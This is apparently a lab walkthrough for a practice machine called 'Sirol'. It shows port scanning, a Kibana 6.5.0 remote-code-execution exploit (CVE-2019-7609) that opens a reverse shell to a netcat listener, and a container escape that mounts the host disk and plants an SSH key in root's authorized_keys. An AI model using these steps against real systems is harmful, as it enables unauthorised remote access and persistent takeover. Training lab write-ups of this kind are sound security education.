Sirol
nmap
nmap
sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
Kibana is running on port 5601

Web enumeration
Looks like Kibana is running on version 6.5.0 which is vulnerable to Remote Code Execution.

Exploitation
Visit https://github.com/LandGrey/CVE-2019-7609/ and copy the python exploit to your local machine.

Set a reverse shell listener
sudo nc -lvnp 80
Run the exploit
python exploit.py -u http://192.168.225.54:5601 -host <your machine's IP> -port 80 --shell
And you should receive a root shell inside a Docker container.

Privilege Escalation
Looks like --privilege
flag is set since we can run fdisk -l

Let's mount /dev/sda1
mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
Create .ssh
folder on /root
cd /mnt/hola/root
mkdir .ssh
cd .ssh
Copy your .ssh/id_rsa.pub
and paste it to the remote machine's .ssh/authorized_keys
echo 'insert your public ssh key' > authorized_keys
Now you can SSH directly to the machine and escape the container.

Thanks for reading and enjoy the rest of your day!
Last updated
Was this helpful?